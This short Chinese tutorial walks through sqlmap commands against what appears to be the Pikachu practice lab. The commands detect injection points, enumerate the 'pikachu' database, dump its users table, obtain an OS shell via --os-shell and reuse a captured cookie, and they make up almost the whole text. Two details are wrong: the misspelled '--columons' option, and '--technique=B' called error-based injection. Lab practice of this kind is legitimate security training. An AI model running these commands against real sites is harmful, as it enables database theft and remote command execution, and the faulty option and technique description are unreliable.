sqlmap.py -u "URL" 此语句的作用为检测该url是否存在注入点
使用?进行传参,传递的参数为name和submit,注入点在name
当然,有时并非GET传参而是POST传参
此时就需要指定传递的data参数:
sqlmap.py -u "URL" --data="uname=admin&passwd=admin&submit=Submit"
可以使用如下语句来判断当前用户是否为管理员
sqlmap.py -u "URL" --is-dba
可以看到为false
可以使用如下语句来判断当前库名
sqlmap.py -u "URL" --current-db
可以看到库名为pikachu
爆出了库名就可以爆表名了
sqlmap.py -u "URL" -D pikachu --tables
接下来就是字段名了
sqlmap.py -u "URL" -D pikachu -T users --columons
使用dump可以指定字段进行下载
sqlmap.py -u "URL" -D pikachu -T users -C id --dump
也可以通过指定数据库指定表名爆出所有数据
sqlmap.py -u "URL" -D pikachu -T users --dump
还可以指定SQL注入的方法
比如:sqlmap.py --technique=B 就是使用报错注入
sqlmap还可以用于命令执行
sqlmap.py -u "URL" --os-shell(本质上是写入两个文件,一个用于上传命令,另一个用于输出返回)
有时会遇到需要登录的网站,可以指定cookie:
sqlmap.py -u "URL" --cookie="抓取的cookie"